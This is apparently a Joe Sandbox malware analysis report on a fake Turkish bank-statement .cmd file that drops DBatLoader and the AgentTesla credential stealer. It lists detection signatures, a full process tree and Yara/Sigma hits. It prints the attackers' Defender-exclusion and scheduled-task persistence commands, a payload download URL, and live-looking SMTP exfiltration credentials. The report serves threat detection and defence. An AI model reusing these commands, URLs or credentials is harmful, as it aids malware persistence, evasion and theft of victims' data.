Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd

Overview

General Information

Sample name:TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd
Analysis ID:1554476
MD5:c3fd77ee6020a412a9ce44fe17c703dd
SHA1:9ce6674753ea01856b334a26068cb6df9cb07d0f
SHA256:19b0d0d3e3946758994d9260a1e11b794ab964ef0c8b5aa9c43a3dae7c2be495
Tags:cmduser-lowmal3
Infos:

Detection

AgentTesla, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected AgentTesla
Yara detected DBatLoader
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6544 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 6052 cmdline: extrac32 /y "C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • x.exe (PID: 4308 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 31BC6907D6097A76BB1DD891CFC09B7A)
      • cmd.exe (PID: 3228 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 2676 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • esentutl.exe (PID: 6128 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 3364 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • lxsyrsiW.pif (PID: 2924 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
        • neworigin.exe (PID: 6488 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
        • server_BTC.exe (PID: 6788 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • powershell.exe (PID: 5148 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7248 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 5988 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • TrojanAIbot.exe (PID: 1088 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • cmd.exe (PID: 1272 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD0BF.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 6052 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • TrojanAIbot.exe (PID: 7184 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 7428 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 31BC6907D6097A76BB1DD891CFC09B7A)
    • lxsyrsiW.pif (PID: 7528 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 7592 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 7612 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 7804 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 31BC6907D6097A76BB1DD891CFC09B7A)
    • lxsyrsiW.pif (PID: 7868 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 7948 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • TrojanAIbot.exe (PID: 8088 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      C:\Users\user\AppData\Local\Temp\neworigin.exeINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
      • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
      • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
      • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
      • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
      • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
      • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
      • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
      • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
      SourceRuleDescriptionAuthorStrings
      0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 12 entries
                SourceRuleDescriptionAuthorStrings
                12.0.neworigin.exe.6d0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  12.0.neworigin.exe.6d0000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    12.0.neworigin.exe.6d0000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    4.2.x.exe.2d90000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

                      System Summary

                      barindex
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4308, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4308, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 2924, ProcessName: lxsyrsiW.pif
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4308, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6788, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5148, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4308, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4308, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 2924, ProcessName: lxsyrsiW.pif
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6788, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5148, ProcessName: powershell.exe
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 6788, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6788, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5988, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 6488, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6788, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5988, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6788, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5148, ProcessName: powershell.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-12T15:28:27.297167+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549708TCP
                      2024-11-12T15:28:58.958739+010020229301A Network Trojan was detected4.245.163.56443192.168.2.550629TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-12T15:28:10.530955+010020283713Unknown Traffic192.168.2.549705198.252.105.91443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeAvira: detection malicious, Label: TR/Spy.Gen8
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdMalware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
                      Source: 12.0.neworigin.exe.6d0000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeReversingLabs: Detection: 65%
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeReversingLabs: Detection: 65%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeJoe Sandbox ML: detected
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49721 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49755 version: TLS 1.2
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A88000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054000196.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A75000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000007.00000003.2106786237.0000000005180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000008.00000003.2111119072.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054794048.0000000002B5F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2111066376.0000000021E9F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2136598756.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2111066376.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A88000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054000196.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A75000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000007.00000003.2106786237.0000000005180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdb source: esentutl.exe, 00000008.00000003.2111119072.0000000000B90000.00000004.00001000.00020000.00000000.sdmp

                      Spreading

                      barindex
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02D95908
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 015E7394h13_2_015E7188
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 015E78DCh13_2_015E7688
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h13_2_015E7E60
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 015E78DCh13_2_015E7642
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 015E78DCh13_2_015E767A
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h13_2_015E7E58

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: https://gxe0.com/yak/233_Wisrysxlfss
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DAE4B8 InternetCheckConnectionA,4_2_02DAE4B8
                      Source: global trafficTCP traffic: 192.168.2.5:49707 -> 51.195.88.199:587
